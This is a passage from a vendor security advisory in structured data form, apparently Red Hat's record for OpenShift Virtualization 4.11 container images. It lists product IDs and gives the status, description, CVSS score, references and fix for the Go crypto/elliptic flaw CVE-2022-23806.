"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control", }, { cve: "CVE-2022-23806", cwe: { id: "CWE-252", name: "Unchecked Return Value", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053429", }, ], notes: [ { category: "description", text: "A flaw was found in the elliptic package of the crypto library in golang when the IsOnCurve function could return true for invalid field elements. This flaw allows an attacker to take advantage of this undefined behavior, affecting the availability and integrity of the resource.", title: "Vulnerability description", }, { category: "summary", text: "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 8 and 9 are affected because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having a Moderate security impact. The issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7; hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16 & 1.17), will not be addressed in future updates as shipped only in RHEL-7, hence, marked as Out-of-Support-Scope.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23806", }, { category: "external", summary: "RHBZ#2053429", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053429", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23806", url: "https://www.cve.org/CVERecord?id=CVE-2022-23806", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23806", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23806", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-02-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.1, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", 